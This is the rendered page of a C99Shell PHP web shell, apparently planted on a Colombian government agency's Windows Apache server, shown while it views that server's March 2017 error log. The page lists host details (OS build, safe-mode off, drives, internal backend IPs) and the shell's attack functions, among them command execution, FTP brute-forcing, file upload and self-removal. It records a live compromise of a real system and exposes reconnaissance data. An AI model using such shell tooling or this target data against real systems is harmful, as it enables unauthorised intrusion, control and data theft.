!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2017.03.27.log (28.46 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Mon Mar 27 01:43:24.173433 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 01:54:45.067829 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 02:20:43.931767 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 02:49:50.386035 2017] [access_compat:error] [pid 5032:tid 15236] [client 191.96.249.97:43847] AH01797: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Mon Mar 27 03:39:17.308446 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 03:43:55.394534 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 03:56:14.913833 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 04:46:41.553149 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 05:12:04.771025 2017] [core:error] [pid 5032:tid 16176] (20024)The given path is misformatted or contained invalid characters: [client 5.188.211.19:46663] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 05:12:42.086290 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 05:29:08.382422 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 05:51:31.934782 2017] [core:error] [pid 5032:tid 16476] (20024)The given path is misformatted or contained invalid characters: [client 5.188.211.14:42188] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 07:35:39.761356 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:8529] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 07:35:50.088574 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:8529] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 07:35:50.962176 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:9143] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Mon Mar 27 07:36:01.320594 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:9143] AH00127: Cannot map GET /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Mon Mar 27 07:37:34.780358 2017] [proxy_http:error] [pid 5032:tid 15768] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22271] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 07:37:34.780358 2017] [proxy:error] [pid 5032:tid 15768] [client 201.245.192.253:22271] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 07:37:34.780358 2017] [proxy_http:error] [pid 5032:tid 14880] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22269] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 07:37:34.780358 2017] [proxy:error] [pid 5032:tid 14880] [client 201.245.192.253:22269] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 07:46:33.901705 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 08:31:22.878428 2017] [proxy_http:error] [pid 5032:tid 14804] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34536] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 08:31:22.878428 2017] [proxy:error] [pid 5032:tid 14804] [client 201.245.192.253:34536] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 08:36:51.773806 2017] [core:error] [pid 5032:tid 16176] (20024)The given path is misformatted or contained invalid characters: [client 104.199.26.189:34766] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 08:42:30.029200 2017] [core:error] [pid 5032:tid 14880] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:6039] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 08:42:40.356418 2017] [core:error] [pid 5032:tid 14880] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:6039] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 08:42:41.120819 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:6536] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Mon Mar 27 08:42:51.448037 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:6536] AH00127: Cannot map GET /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Mon Mar 27 08:43:56.671752 2017] [proxy_http:error] [pid 5032:tid 14732] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16951] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 08:43:56.671752 2017] [proxy:error] [pid 5032:tid 14732] [client 201.245.192.253:16951] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 08:43:56.671752 2017] [proxy_http:error] [pid 5032:tid 15924] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16950] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 08:43:56.671752 2017] [proxy:error] [pid 5032:tid 15924] [client 201.245.192.253:16950] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 08:43:58.122554 2017] [proxy_http:error] [pid 5032:tid 14824] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16949] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 09:25:16.935708 2017] [proxy_http:error] [pid 5032:tid 16176] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:21300] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Mar 27 09:25:16.935708 2017] [proxy:error] [pid 5032:tid 16176] [client 201.245.192.253:21300] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Ayuda.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Mar 27 09:27:22.110328 2017] [core:error] [pid 5032:tid 15808] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:8973] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 09:27:32.593547 2017] [core:error] [pid 5032:tid 15808] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:8973] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 09:27:35.495152 2017] [core:error] [pid 5032:tid 15808] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:5390] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Mon Mar 27 09:27:45.931570 2017] [core:error] [pid 5032:tid 15808] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.36:5390] AH00127: Cannot map GET /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Mon Mar 27 09:34:48.239912 2017] [core:error] [pid 5032:tid 15056] [client 71.6.165.200:60719] AH00135: Invalid method in request quit
[Mon Mar 27 12:00:33.334472 2017] [proxy:error] [pid 5032:tid 15180] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Mar 27 12:00:33.334472 2017] [proxy:error] [pid 5032:tid 15180] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Mar 27 12:00:33.334472 2017] [proxy_http:error] [pid 5032:tid 15180] [client 152.61.128.50:34166] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Mar 27 12:00:33.537272 2017] [proxy:error] [pid 5032:tid 15024] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Mar 27 12:00:34.130073 2017] [proxy:error] [pid 5032:tid 15024] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Mar 27 12:51:47.023470 2017] [proxy_http:error] [pid 5032:tid 15332] (20014)Internal error: [client 201.245.192.253:14564] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Mon Mar 27 12:51:47.070270 2017] [proxy_http:error] [pid 5032:tid 15780] (20014)Internal error: [client 201.245.192.253:14528] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Mon Mar 27 13:39:33.980906 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 13:51:28.243760 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 13:52:15.699044 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 14:00:24.900303 2017] [core:error] [pid 5032:tid 15936] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:13841] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 14:08:13.119525 2017] [core:error] [pid 5032:tid 14788] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:8673] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 14:08:18.142734 2017] [core:error] [pid 5032:tid 15036] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:10752] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 14:30:32.179077 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 14:32:12.128453 2017] [proxy:error] [pid 5032:tid 15712] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.32:80 (172.22.1.32) failed
[Mon Mar 27 14:32:12.128453 2017] [proxy:error] [pid 5032:tid 15712] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.32) for 60s
[Mon Mar 27 14:32:12.128453 2017] [proxy_http:error] [pid 5032:tid 15712] [client 190.147.85.179:61477] AH01114: HTTP: failed to make connection to backend: 172.22.1.32, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Mon Mar 27 14:35:46.769230 2017] [core:error] [pid 5032:tid 15180] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:21432] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 14:49:03.478229 2017] [core:error] [pid 5032:tid 15768] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:4753] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 14:55:13.620079 2017] [core:error] [pid 5032:tid 16476] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:6630] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 15:03:17.626529 2017] [proxy_http:error] [pid 5032:tid 14988] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:29777] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 15:03:33.788158 2017] [proxy_http:error] [pid 5032:tid 15520] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:29948] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Mar 27 15:03:35.878561 2017] [proxy_http:error] [pid 5032:tid 15600] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:29778] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Mar 27 15:08:24.447868 2017] [core:error] [pid 5032:tid 15252] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:12734] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 15:16:36.566333 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 15:21:01.829199 2017] [core:error] [pid 5032:tid 14988] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:3006] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 15:24:53.786006 2017] [proxy_http:error] [pid 5032:tid 15652] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17245] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 15:24:53.786006 2017] [proxy:error] [pid 5032:tid 15652] [client 201.245.192.253:17245] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 15:24:53.832806 2017] [proxy_http:error] [pid 5032:tid 15968] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17247] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 15:24:53.832806 2017] [proxy:error] [pid 5032:tid 15968] [client 201.245.192.253:17247] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 15:28:19.503567 2017] [core:error] [pid 5032:tid 14892] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:12623] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 15:31:38.825117 2017] [proxy_http:error] [pid 5032:tid 14804] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12707] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp
[Mon Mar 27 15:34:47.554249 2017] [core:error] [pid 5032:tid 14776] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:26593] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 15:37:54.489377 2017] [proxy_http:error] [pid 5032:tid 15948] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34697] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Mon Mar 27 15:37:54.489377 2017] [proxy_http:error] [pid 5032:tid 14836] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22502] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Mon Mar 27 15:37:54.489377 2017] [proxy:error] [pid 5032:tid 14836] [client 201.245.192.253:22502] AH00898: Error reading from remote server returned by /ISOlucionSDA/g/Plantillas/ModeloMP2/img_interAzul_r1_c3.png, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Mon Mar 27 15:37:54.489377 2017] [proxy_http:error] [pid 5032:tid 15056] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22500] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Mon Mar 27 15:37:54.489377 2017] [proxy:error] [pid 5032:tid 15056] [client 201.245.192.253:22500] AH00898: Error reading from remote server returned by /ISOlucionSDA/g/Plantillas/ModeloMP2/img_interAzul_r1_c1.png, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Mon Mar 27 15:47:35.855598 2017] [core:error] [pid 5032:tid 15220] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:21004] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 15:47:44.513614 2017] [core:error] [pid 5032:tid 15584] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:22760] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 16:03:39.126090 2017] [proxy_http:error] [pid 5032:tid 16088] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:21594] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Session.asp
[Mon Mar 27 16:03:39.126090 2017] [proxy:error] [pid 5032:tid 16088] [client 201.245.192.253:21594] AH00898: Error reading from remote server returned by /IsolucionSDA/Session.asp, referer: http://190.27.245.106/IsolucionSDA/Session.asp
[Mon Mar 27 16:06:12.911160 2017] [core:error] [pid 5032:tid 16136] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:5681] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 16:06:51.287228 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 16:12:03.069375 2017] [core:error] [pid 5032:tid 15552] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:2835] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 16:12:09.964587 2017] [core:error] [pid 5032:tid 14956] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:6371] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 16:12:21.118607 2017] [core:error] [pid 5032:tid 15340] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:11104] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 16:44:23.119983 2017] [core:error] [pid 5032:tid 15316] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:13353] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 16:47:53.174352 2017] [proxy_http:error] [pid 5032:tid 15080] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.28.1.106:55068] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Mon Mar 27 16:47:53.174352 2017] [proxy:error] [pid 5032:tid 15080] [client 186.28.1.106:55068] AH00898: Error reading from remote server returned by /isolucionsda/, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Mon Mar 27 16:49:36.384133 2017] [proxy_http:error] [pid 5032:tid 15452] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19608] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Mar 27 16:49:36.384133 2017] [proxy:error] [pid 5032:tid 15452] [client 201.245.192.253:19608] AH00898: Error reading from remote server returned by /isolucionsda/SucursalSeleccion.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Mar 27 16:49:42.468144 2017] [proxy_http:error] [pid 5032:tid 15768] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22039] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Mar 27 16:49:42.577344 2017] [proxy_http:error] [pid 5032:tid 15888] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:18467] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Mar 27 18:07:18.202721 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 18:24:47.554164 2017] [proxy_http:error] [pid 5032:tid 15048] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33605] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 18:24:47.554164 2017] [proxy:error] [pid 5032:tid 15048] [client 201.245.192.253:33605] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 18:24:47.554164 2017] [proxy_http:error] [pid 5032:tid 15912] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33604] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 18:24:47.554164 2017] [proxy:error] [pid 5032:tid 15912] [client 201.245.192.253:33604] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 18:24:53.388574 2017] [proxy_http:error] [pid 5032:tid 15056] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33613] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 18:24:53.388574 2017] [proxy:error] [pid 5032:tid 15056] [client 201.245.192.253:33613] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Mar 27 18:40:33.789426 2017] [access_compat:error] [pid 5032:tid 14700] [client 172.106.11.34:47666] AH01797: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Mon Mar 27 18:40:33.961026 2017] [access_compat:error] [pid 5032:tid 15888] [client 172.106.11.34:48020] AH01797: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Mon Mar 27 19:10:04.423736 2017] [core:error] [pid 5032:tid 15960] (20024)The given path is misformatted or contained invalid characters: [client 65.208.151.113:35173] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file, referer: http://www.dama.gov.co/
[Mon Mar 27 19:20:00.001582 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 19:44:20.663348 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Mar 27 19:47:51.014117 2017] [core:error] [pid 5032:tid 14812] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.58:21815] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 20:23:54.207517 2017] [proxy_http:error] [pid 5032:tid 16396] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.84.210.22:47752] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 20:23:54.207517 2017] [proxy:error] [pid 5032:tid 16396] [client 190.84.210.22:47752] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Mar 27 21:37:53.507314 2017] [core:error] [pid 5032:tid 15592] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.200:3869] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Mar 27 22:07:27.729630 2017] [mpm_winnt:warn] [pid 5032:tid 17792] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.1092 ]--